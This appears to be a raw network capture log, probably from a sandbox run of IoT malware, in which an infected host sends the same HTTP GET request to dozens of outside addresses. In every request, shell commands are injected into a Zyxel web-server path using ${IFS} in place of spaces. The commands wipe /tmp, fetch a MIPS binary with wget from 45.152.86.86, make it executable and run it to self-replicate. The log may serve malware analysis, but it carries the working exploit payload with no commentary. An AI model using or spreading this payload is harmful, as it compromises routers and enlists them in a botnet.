                              Mar 31, 2024 08:41:19.717966080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3239192.168.2.1338350140.152.36.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.717988014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3240192.168.2.1345592145.71.34.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718014002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3241192.168.2.135317240.131.23.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718076944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3242192.168.2.1341544184.86.70.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718105078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3243192.168.2.1335808148.229.35.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718146086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3244192.168.2.135375244.57.33.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718198061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3245192.168.2.1354994143.254.177.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718230963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3246192.168.2.1341376217.158.40.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718281984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3247192.168.2.134861832.206.90.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718327999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3248192.168.2.1346224160.109.71.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718369961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3249192.168.2.134874094.69.201.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718434095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3250192.168.2.1334116124.64.32.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718470097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3251192.168.2.134530467.129.93.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718509912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3252192.168.2.1353204222.18.165.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718549013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3253192.168.2.1356304103.41.170.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718585014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3254192.168.2.1335760126.201.184.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718637943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3255192.168.2.1352930138.29.192.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718674898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3256192.168.2.1354432123.53.233.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718725920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3257192.168.2.133333496.181.109.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718770027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3258192.168.2.1339978201.214.209.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718833923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3259192.168.2.135158263.200.64.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718866110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3260192.168.2.1352188145.91.196.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718908072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3261192.168.2.133494020.232.246.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718951941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3262192.168.2.133883825.185.176.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.718978882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3263192.168.2.1333506174.88.235.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719026089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3264192.168.2.1335354192.102.144.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719053984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3265192.168.2.134117212.167.147.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719105959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3266192.168.2.1347764209.227.199.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719168901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3267192.168.2.134722648.13.123.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719201088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3268192.168.2.1340284152.87.56.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719239950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3269192.168.2.1352028116.69.144.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719286919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3270192.168.2.1349212223.249.31.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719321966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3271192.168.2.1351546205.160.239.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719367027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3272192.168.2.1357816107.155.157.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719422102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3273192.168.2.134436672.194.2.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719445944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3274192.168.2.134914251.95.111.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719489098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3275192.168.2.1349124160.206.86.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719525099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3276192.168.2.1349378217.192.55.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719578028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3277192.168.2.135777677.141.129.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719626904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3278192.168.2.133930437.83.42.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719679117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3279192.168.2.135510490.186.189.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719717026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3280192.168.2.134558661.136.112.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719770908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3281192.168.2.1356214113.87.228.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719808102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3282192.168.2.135251294.57.107.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719851017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3283192.168.2.134023449.177.49.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719892979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3284192.168.2.1347678113.117.142.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719935894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3285192.168.2.1332822207.188.85.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.719979048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3286192.168.2.1360236203.179.251.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720032930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3287192.168.2.1343736173.144.204.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720052958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3288192.168.2.1354554132.68.238.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720067024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3289192.168.2.134047090.246.220.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720118999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3290192.168.2.1355456207.89.211.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720171928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3291192.168.2.133863466.17.39.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720212936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3292192.168.2.1359624151.180.132.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720263958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3293192.168.2.1354458114.39.132.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720288038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3294192.168.2.134490452.207.75.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720330954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3295192.168.2.1335508221.175.117.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720382929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3296192.168.2.1352166173.125.124.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720432043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3297192.168.2.1360322142.6.67.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720459938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3298192.168.2.1338800171.19.95.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720499039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3299192.168.2.1350868180.12.246.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720530033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3300192.168.2.1359396174.179.13.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720586061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3301192.168.2.1340124121.131.83.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720623016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3302192.168.2.1342264196.81.1.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720643997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3303192.168.2.1358950129.130.144.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720695972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3304192.168.2.135976068.35.88.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720727921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3305192.168.2.1355140132.189.170.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720778942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3306192.168.2.135404684.198.66.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720815897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3307192.168.2.1358308177.99.108.183443
                              TimestampBytes transferredDirectionData
